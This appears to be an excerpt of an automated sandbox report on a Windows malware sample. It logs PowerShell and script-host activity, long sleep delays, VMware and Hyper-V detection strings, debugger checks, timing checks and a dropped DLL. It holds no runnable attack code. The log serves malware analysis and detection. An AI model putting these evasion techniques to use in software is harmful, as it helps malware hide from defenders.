Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 16_2_0162D1C0 rdtsc

16_2_0162D1C0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7734	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1793	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3915	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5855	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rll3hpdk\rll3hpdk.dll

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

API coverage: 0.8 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7752	Thread sleep count: 7734 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7748	Thread sleep count: 1793 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7800	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6708	Thread sleep time: -16602069666338586s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 8188	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: powershell.exe, 00000003.00000002.1352224226.0000000004CC7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.1355812282.00000000073C3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\zz
Source: wscript.exe, 0000000C.00000003.1345497124.0000000005491000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000003.00000002.1352224226.0000000004CC7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.1358235990.0000000008363000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: powershell.exe, 00000003.00000002.1358235990.0000000008330000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1358235990.0000000008363000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000003.00000002.1358235990.0000000008363000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: powershell.exe, 00000003.00000002.1352224226.0000000004CC7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: powershell.exe, 0000000D.00000002.1649526949.0000000007AC9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 16_2_0162D1C0 rdtsc

16_2_0162D1C0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 16_2_004175D3 LdrLoadDll,

16_2_004175D3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015B7152 mov eax, dword ptr fs:[00000030h]	16_2_015B7152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AC156 mov eax, dword ptr fs:[00000030h]	16_2_015AC156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015B6154 mov eax, dword ptr fs:[00000030h]	16_2_015B6154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015B6154 mov eax, dword ptr fs:[00000030h]	16_2_015B6154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015A9148 mov eax, dword ptr fs:[00000030h]	16_2_015A9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015A9148 mov eax, dword ptr fs:[00000030h]	16_2_015A9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015A9148 mov eax, dword ptr fs:[00000030h]	16_2_015A9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015A9148 mov eax, dword ptr fs:[00000030h]	16_2_015A9148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01649179 mov eax, dword ptr fs:[00000030h]	16_2_01649179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01644144 mov eax, dword ptr fs:[00000030h]	16_2_01644144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01644144 mov eax, dword ptr fs:[00000030h]	16_2_01644144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01644144 mov ecx, dword ptr fs:[00000030h]	16_2_01644144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01644144 mov eax, dword ptr fs:[00000030h]	16_2_01644144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01644144 mov eax, dword ptr fs:[00000030h]	16_2_01644144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AF172 mov eax, dword ptr fs:[00000030h]	16_2_015AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AF172 mov eax, dword ptr fs:[00000030h]	16_2_015AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AF172 mov eax, dword ptr fs:[00000030h]	16_2_015AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AF172 mov eax, dword ptr fs:[00000030h]	16_2_015AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AF172 mov eax, dword ptr fs:[00000030h]	16_2_015AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AF172 mov eax, dword ptr fs:[00000030h]	16_2_015AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AF172 mov eax, dword ptr fs:[00000030h]	16_2_015AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AF172 mov eax, dword ptr fs:[00000030h]	16_2_015AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AF172 mov eax, dword ptr fs:[00000030h]	16_2_015AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AF172 mov eax, dword ptr fs:[00000030h]	16_2_015AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AF172 mov eax, dword ptr fs:[00000030h]	16_2_015AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AF172 mov eax, dword ptr fs:[00000030h]	16_2_015AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AF172 mov eax, dword ptr fs:[00000030h]	16_2_015AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AF172 mov eax, dword ptr fs:[00000030h]	16_2_015AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AF172 mov eax, dword ptr fs:[00000030h]	16_2_015AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AF172 mov eax, dword ptr fs:[00000030h]	16_2_015AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AF172 mov eax, dword ptr fs:[00000030h]	16_2_015AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AF172 mov eax, dword ptr fs:[00000030h]	16_2_015AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AF172 mov eax, dword ptr fs:[00000030h]	16_2_015AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AF172 mov eax, dword ptr fs:[00000030h]	16_2_015AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AF172 mov eax, dword ptr fs:[00000030h]	16_2_015AF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01685152 mov eax, dword ptr fs:[00000030h]	16_2_01685152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01648158 mov eax, dword ptr fs:[00000030h]	16_2_01648158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015B1131 mov eax, dword ptr fs:[00000030h]	16_2_015B1131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015B1131 mov eax, dword ptr fs:[00000030h]	16_2_015B1131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AB136 mov eax, dword ptr fs:[00000030h]	16_2_015AB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AB136 mov eax, dword ptr fs:[00000030h]	16_2_015AB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AB136 mov eax, dword ptr fs:[00000030h]	16_2_015AB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AB136 mov eax, dword ptr fs:[00000030h]	16_2_015AB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01670115 mov eax, dword ptr fs:[00000030h]	16_2_01670115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015E0124 mov eax, dword ptr fs:[00000030h]	16_2_015E0124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0165A118 mov ecx, dword ptr fs:[00000030h]	16_2_0165A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0165A118 mov eax, dword ptr fs:[00000030h]	16_2_0165A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0165A118 mov eax, dword ptr fs:[00000030h]	16_2_0165A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0165A118 mov eax, dword ptr fs:[00000030h]	16_2_0165A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_016861E5 mov eax, dword ptr fs:[00000030h]	16_2_016861E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015ED1D0 mov eax, dword ptr fs:[00000030h]	16_2_015ED1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015ED1D0 mov ecx, dword ptr fs:[00000030h]	16_2_015ED1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_016571F9 mov esi, dword ptr fs:[00000030h]	16_2_016571F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_016851CB mov eax, dword ptr fs:[00000030h]	16_2_016851CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_016761C3 mov eax, dword ptr fs:[00000030h]	16_2_016761C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_016761C3 mov eax, dword ptr fs:[00000030h]	16_2_016761C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015E01F8 mov eax, dword ptr fs:[00000030h]	16_2_015E01F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015D51EF mov eax, dword ptr fs:[00000030h]	16_2_015D51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015D51EF mov eax, dword ptr fs:[00000030h]	16_2_015D51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015D51EF mov eax, dword ptr fs:[00000030h]	16_2_015D51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015D51EF mov eax, dword ptr fs:[00000030h]	16_2_015D51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015D51EF mov eax, dword ptr fs:[00000030h]	16_2_015D51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015D51EF mov eax, dword ptr fs:[00000030h]	16_2_015D51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015D51EF mov eax, dword ptr fs:[00000030h]	16_2_015D51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015D51EF mov eax, dword ptr fs:[00000030h]	16_2_015D51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015D51EF mov eax, dword ptr fs:[00000030h]	16_2_015D51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015D51EF mov eax, dword ptr fs:[00000030h]	16_2_015D51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015D51EF mov eax, dword ptr fs:[00000030h]	16_2_015D51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015D51EF mov eax, dword ptr fs:[00000030h]	16_2_015D51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015D51EF mov eax, dword ptr fs:[00000030h]	16_2_015D51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0162E1D0 mov eax, dword ptr fs:[00000030h]	16_2_0162E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0162E1D0 mov eax, dword ptr fs:[00000030h]	16_2_0162E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0162E1D0 mov ecx, dword ptr fs:[00000030h]	16_2_0162E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0162E1D0 mov eax, dword ptr fs:[00000030h]	16_2_0162E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0162E1D0 mov eax, dword ptr fs:[00000030h]	16_2_0162E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015B51ED mov eax, dword ptr fs:[00000030h]	16_2_015B51ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_016611A4 mov eax, dword ptr fs:[00000030h]	16_2_016611A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_016611A4 mov eax, dword ptr fs:[00000030h]	16_2_016611A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_016611A4 mov eax, dword ptr fs:[00000030h]	16_2_016611A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_016611A4 mov eax, dword ptr fs:[00000030h]	16_2_016611A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AA197 mov eax, dword ptr fs:[00000030h]	16_2_015AA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AA197 mov eax, dword ptr fs:[00000030h]	16_2_015AA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AA197 mov eax, dword ptr fs:[00000030h]	16_2_015AA197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F0185 mov eax, dword ptr fs:[00000030h]	16_2_015F0185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015CB1B0 mov eax, dword ptr fs:[00000030h]	16_2_015CB1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0166C188 mov eax, dword ptr fs:[00000030h]	16_2_0166C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0166C188 mov eax, dword ptr fs:[00000030h]	16_2_0166C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01607190 mov eax, dword ptr fs:[00000030h]	16_2_01607190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0163019F mov eax, dword ptr fs:[00000030h]	16_2_0163019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0163019F mov eax, dword ptr fs:[00000030h]	16_2_0163019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0163019F mov eax, dword ptr fs:[00000030h]	16_2_0163019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0163019F mov eax, dword ptr fs:[00000030h]	16_2_0163019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01685060 mov eax, dword ptr fs:[00000030h]	16_2_01685060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015B2050 mov eax, dword ptr fs:[00000030h]	16_2_015B2050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0163106E mov eax, dword ptr fs:[00000030h]	16_2_0163106E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015DB052 mov eax, dword ptr fs:[00000030h]	16_2_015DB052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0162D070 mov ecx, dword ptr fs:[00000030h]	16_2_0162D070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C1070 mov eax, dword ptr fs:[00000030h]	16_2_015C1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C1070 mov ecx, dword ptr fs:[00000030h]	16_2_015C1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C1070 mov eax, dword ptr fs:[00000030h]	16_2_015C1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C1070 mov eax, dword ptr fs:[00000030h]	16_2_015C1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C1070 mov eax, dword ptr fs:[00000030h]	16_2_015C1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C1070 mov eax, dword ptr fs:[00000030h]	16_2_015C1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C1070 mov eax, dword ptr fs:[00000030h]	16_2_015C1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C1070 mov eax, dword ptr fs:[00000030h]	16_2_015C1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C1070 mov eax, dword ptr fs:[00000030h]	16_2_015C1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C1070 mov eax, dword ptr fs:[00000030h]	16_2_015C1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C1070 mov eax, dword ptr fs:[00000030h]	16_2_015C1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C1070 mov eax, dword ptr fs:[00000030h]	16_2_015C1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C1070 mov eax, dword ptr fs:[00000030h]	16_2_015C1070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015DC073 mov eax, dword ptr fs:[00000030h]	16_2_015DC073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01636050 mov eax, dword ptr fs:[00000030h]	16_2_01636050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0165705E mov ebx, dword ptr fs:[00000030h]	16_2_0165705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0165705E mov eax, dword ptr fs:[00000030h]	16_2_0165705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015CE016 mov eax, dword ptr fs:[00000030h]	16_2_015CE016
